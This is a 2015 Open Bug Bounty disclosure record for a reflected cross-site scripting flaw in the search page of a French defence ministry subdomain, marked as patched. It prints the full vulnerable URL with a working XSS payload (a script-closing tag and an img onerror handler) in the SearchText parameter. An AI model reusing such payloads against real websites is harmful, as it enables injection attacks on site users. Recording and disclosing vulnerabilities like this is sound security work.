en.cimd.interarmees.defense.gouv.fr XSS vulnerability

2015-10-11T00:24:00
ID OBB:91203
Type openbugbounty
Reporter P4r4Bellum
Modified 2015-10-11T00:26:00

Description

Vulnerable URL:
http://en.cimd.interarmees.defense.gouv.fr/rubriques-complementaires/recherche?SearchText=%3C/script%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSSPOSED%2F%29%3E&subtree;=2
Details:

Description| Value
---|---
Patched:| Yes, at 01.11.2015
Latest check for patch:| 01.11.2015 01:29 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check en.cimd.interarmees.defense.gouv.fr SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 11 October, 2015 00:24 GMT
Vulnerability existence verified and confirmed| 11 October, 2015 00:26 GMT